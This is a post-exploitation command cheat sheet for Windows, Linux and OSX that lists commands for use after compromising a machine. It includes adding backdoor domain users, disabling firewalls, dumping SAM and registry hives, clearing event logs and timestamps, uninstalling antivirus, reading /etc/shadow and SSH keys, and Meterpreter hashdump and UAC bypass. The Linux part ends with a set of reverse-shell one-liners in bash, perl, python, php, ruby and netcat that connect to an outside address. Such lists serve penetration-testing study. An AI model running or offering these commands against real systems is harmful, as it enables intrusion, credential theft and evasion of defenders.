8/3/2019 Post Exploit
Windows Post Exploitation Command List
# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal
%SYSTEMDRIVE%\boot.ini
# System
##example: COMMAND [syntax1] | [syntax2] (explanation1; explanation2)
whoami
whoami /all
set
qwinsta
qprocess *
at
schtasks [/query /fo csv /v]
net start
sc getkeyname "Shell Hardware Detection" (use the display name from net start)
sc qc ShellHWDetection (use the key name from getkeyname)
net config workstation
net time
net file
net session
net use
tasklist [/m] | [/svc] | [/m {dll}]
fsutil fsinfo drives
# Networking
ipconfig /all
ipconfig /displaydns
netstat -bano
netstat -s -p [tcp|udp|icmp|ip]
netstat -r
netstat -na | findstr :445
netstat -nao | findstr LISTENING (XP and up; the -o flag gives the PID, zuk)
netstat -na | findstr LISTENING (any Windows, generic)
netsh diag show all
net view
net view /domain
net view /domain:otherdomain
net user hacker hacker /add /domain (adds a user to the current domain -invasive-)
net user %USERNAME% /domain
net user /domain
net accounts
net accounts /domain
net localgroup administrators
net localgroup administrators /domain (this was supposed to use localgroup & domain, but it is actually another way of getting the *current* domain admins. Zuk)
net group domain admins /domain
net group enterprise admins /domain
net group domain controllers /domain
nbtstat -a [ip_here]
net share
net session | find /c \\
arp -a
route print
netsh firewall set opmode disable (turns off firewall -invasive-)
netsh firewall set opmode enable (enables firewall -might cause loss of connection-)
# Configs
gpresult /z
sc qc [ Service name ]
sc query
sc queryex
type %WINDIR%\System32\drivers\etc\hosts
dir %PROGRAMFILES%
echo %COMSPEC%
# Finding important files
tree C:\ /f
dir /a
dir /b /s [Directory -- filename]
Command | find /c /v "" (counts the lines of output)
# Files to pull if possible
%WINDIR%\repair\sam
%WINDIR%\System32\drivers\etc\hosts
# Remote System Access
net share \\computername
tasklist /V /S computername
net share nothing$=C:\ /grant:hacker,FULL /unlimited -invasive-
#net user hacker hacker /add
#net localgroup administrators /add hacker
#net use X: \\target\nothing$ hacker /USER:hacker
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername (maps IPC$ which does not show up as a drive)
net use \\computername /user:DOMAINNAME\username password (maps IPC$ under another username)
net time \\computername (Shows the time of target computer)
dir \\computername\share_or_admin_share\ (dir list a remote directory)
tasklist /V /S computername (lists tasks with the users running them on a remote system. This removes any IPC$ connection after it is done, so if you are using another user you need to reinitiate the IPC$ mount)
# WMI
wmic bios
wmic qfe
wmic qfe get hotfixid (This gets patches IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create process_name (executes a program)
wmic process where name=process_name call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? to get help)
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about the target)
# Reg Command
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename] (add /s to recurse through all values)
# Deleting Logs
wevtutil el (list logs)
wevtutil cl (Clear specific log)
del %WINDIR%\*.log /a /s /q /f
# Uninstalling Software / AntiVirus (Non interactive)
wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /Interactive:Off (this uninstalls software)
# Other
pkgmgr /iu:Package (useful)
pkgmgr /iu:TelnetServer (Install Telnet Service ...)
pkgmgr /iu:TelnetClient (Client)
rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
wscript.exe
cscript.exe
## OS SPECIFIC
# Win2k3
winpop stat domainname
# Vista/7
winstat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm
(Page break just so we can have the straight up cmds on their own)
## Meterpreter Commands
ps (show running processes and their associated users/id numbers)
getuid
getpid
getprivs (shows current privileges)
getsystem (attempts to get SYSTEM; be warned, it attempts the Kitrap0d local exploit as well)
sysinfo
timestomp (remove/screw up timestamps; if you are good enough this messes up audit tools)
clearev
hashdump or run hashdump (dump SAM file hashes for pass the hash or cracking)
migrate [pid number] (Move from exploited process into another process)
## Useful Meterpreter Scripts
## Useful Meterpreter Post Modules
vsploit
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
post/windows/escalate/bypassuac (mixed results)
## Useful Techniques
Pass The Hash attack (gain access to other computers with stolen hashes, no cracking involved)
Change Wallpaper
Ex: You have to upload a file called wallpaper.bmp to the C: drive
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_MULTI_SZ /d "C:\wallpaper.bmp"
rundll32.exe user32.dll,UpdatePerUserSystemParameters
## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
-=SYSTEM=-
Command        Expected and/or Sample Output
whoami         Returns the username you're logged in as.
systemconfig
Linux/Unix/BSD Post Exploitation Command List
# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it won't trigger an IDS)
/etc/motd, /etc/issue
# System
uname -a
ps aux
ps -aef
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlog
lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
which nmap (see if it's already installed)
locate bin/nmap
which nc (see if it's already installed)
locate bin/
whoami
jps -l
# Networking
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi
# Configs
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (lists all crons)
cat /etc/resolv.conf
cat /etc/lsb-release
cat /etc/redhat-release
cat /etc/samba/smb.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers
# Determine Distro:
/etc/SUSE-release # Novell SUSE
/etc/redhat-release, /etc/redhat_version # Red Hat
/etc/fedora-release # Fedora
/etc/slackware-release, /etc/slackware-version # Slackware
/etc/debian_release, /etc/debian_version # Debian
/etc/mandrake-release # Mandrake
/etc/sun-release # Sun JDS
/etc/release # Solaris/Sparc
/etc/gentoo-release # Gentoo
/etc/lsb-release # ubuntu
?? # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a (often hints at it pretty well)
# Installed Packages
rpm -qa --last | head
yum list | grep installed
dpkg -l
dpkg -l |grep -i linux-image
pkg_info # FreeBSD
#Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf
# Finding Important Files
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib $(echo $PATH | sed 's/:/ /g') -perm -4000 # find suids
## Per User
ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*
find /home/*/.vnc /home/*/.subversion -type f
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l
## Priv (sudo'd or as root)
ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/*
lsof -nPi
ls /home/*/.ssh/*
## Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note: some versions need -l, and many do NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
Listener- Xnest :1
Add permission to connect- xhost +victimIP
## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
-=SYSTEM=-
Command   Expected and/or Sample Output
uname -a  Linux kernel version, distribution
ps aux    List of running processes
id        List current user and group along with user/group id
w         Show who is logged in and what they are doing
who -a    Print information about users
OSX Post Exploitation Command List
# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it won't trigger an IDS)
#SYSTEM
uname -a
sw_vers -productName
sw_vers -productVersion
system_profiler
id
printenv
who
ps aux
ps ea
ls -alh /Applications/
/Library/Application Support/VMware Fusion/vmrun list
/Library/Application Support/VMware Fusion/vmrun CopyFileFromHostToGuest windowsmalicious.exe WindowsVM
/Library/Application Support/VMware Fusion/vmrun captureScreen WindowsVM
Snow Leopard and Lion
dscacheutil -q user
dscacheutil -q group
Tiger
lookupd -q user
lookupd -q group
#Networking
ifconfig
netstat -np tcp
netstat -np udp
#Configs
ls -alh /private/etc/
#Finding Important Files
ls -ma ~/
ls -alh /Users/
ls -alh /Users/*/.ssh/
ls -alh /Users/*/.gnupg/
#Files to pull
#Remote System Access
#Priv
cat /Library/Application Support/Objective Development/Little Snitch/rules.xpl
ls /Library/Application Support/VMware Fusion/licenses/site/